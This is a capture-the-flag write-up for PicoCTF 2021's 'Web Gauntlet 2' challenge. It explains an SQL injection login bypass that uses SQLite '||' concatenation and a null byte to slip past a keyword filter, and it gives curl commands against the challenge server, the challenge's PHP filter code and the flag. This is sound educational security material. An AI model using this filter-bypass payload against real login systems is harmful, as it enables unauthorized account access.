PicoCTF-2021 Writeup
  • README
  • Binary Exploitation
    • Binary Gauntlet 0
    • Binary Gauntlet 1
    • Stonks
    • What's your input?
  • Cryptography
    • Compress and Attack
    • Dachshund Attacks
    • Double DES
    • Easy Peasy
    • It is my Birthday 2
    • It's Not My Fault 1
    • Mini RSA
    • New Caesar
    • New Vignere
    • No Padding, No Problem
    • Pixelated
    • Play Nice
    • Scrambled: RSA
  • Forensics
    • Disk, disk, sleuth!
    • Disk, disk, sleuth! II
    • information
    • MacroHard WeakEdge
    • Matryoshka doll
    • Milkslap
    • Surfing the Waves
    • Trivial Flag Transfer Protocol
    • tunn3l v1s10n
    • Very very very Hidden
    • Weird File
    • Wireshark doo dooo do doo...
    • Wireshark twoo twooo two twoo...
  • Reverse Engineering
    • ARMssembly 0
    • ARMssembly 2
    • ARMssembly 3
    • ARMssembly 4
    • gogo
    • Hurry up! Wait!
    • keygenme-py
    • Let's get dynamic
    • Rolling My Own
    • Shop
    • speeds and feeds
    • Transformation
  • Web Exploitation
    • Ancient History
    • Bithug
    • GET aHEAD
    • It is my Birthday
    • More Cookies
    • Most Cookies
    • Scavenger Hunt
    • Some Assembly Required 1
    • Some Assembly Required 2
    • Some Assembly Required 3
    • Some Assembly Required 4
    • Super Serial
    • Web Gauntlet 2
    • Web Gauntlet 3
    • Who are you?
    • X marks the spot
Powered by GitBook
On this page
  • Problem
  • Solution
  • Flag

Was this helpful?

Edit on GitHub
  1. Web Exploitation

Web Gauntlet 2

PreviousSuper SerialNextWeb Gauntlet 3

Last updated 2 years ago

Was this helpful?

Problem

This website looks familiar... Log in as admin Site: Filter:

Solution

  1. According to the application filters the following: or and true false union like = > < ; -- /* */ admin.

  2. The query that solves this is ad'||'min'%00, which is similar to the final payload in the "Web Gauntlet" challenge from the PicoCTF 2020 Mini competition. In sqlite the || operator concatenates strings, thus allowing us to bypass the filter for admin. Next, the %00 is a null byte, which terminates the SQL query.

  3. A null byte cannot be typed directly into the website. So we use cURL instead: curl --data "user=ad'||'min'%00&pass=a" http://mercury.picoctf.net:35178/index.php --cookie "PHPSESSID=5ntoldq0gkiutgqkmkgfqbe5vb" --output -. I copied the PHPSESSID cookie from the browser, which is important because it is how the website knows to give us the flag when we go to /filter.php to get the flag.

  4. We can retreive the flag with the browser that has the same PHPSESSID or wth curl: curl http://mercury.picoctf.net:35178/filter.php --cookie "PHPSESSID=5ntoldq0gkiutgqkmkgfqbe5vb" | grep picoCTF

  5. The code for the filter and the flag are shown in /filter.php when the login is bypassed:

     <?php
    session_start();
    
    if (!isset($_SESSION["winner2"])) {
        $_SESSION["winner2"] = 0;
    }
    $win = $_SESSION["winner2"];
    $view = ($_SERVER["PHP_SELF"] == "/filter.php");
    
    if ($win === 0) {
        $filter = array("or", "and", "true", "false", "union", "like", "=", ">", "<", ";", "--", "/*", "*/", "admin");
        if ($view) {
            echo "Filters: ".implode(" ", $filter)."<br/>";
        }
    } else if ($win === 1) {
        if ($view) {
            highlight_file("filter.php");
        }
        $_SESSION["winner2"] = 0;        // <- Don't refresh!
    } else {
        $_SESSION["winner2"] = 0;
    }
    
    // picoCTF{0n3_m0r3_t1m3_86f3e77f3c5a076866a0fdb3b29c52fd}
    ?>

Flag

picoCTF{0n3_m0r3_t1m3_86f3e77f3c5a076866a0fdb3b29c52fd}

http://mercury.picoctf.net:35178/
http://mercury.picoctf.net:35178/filter.php
filter.php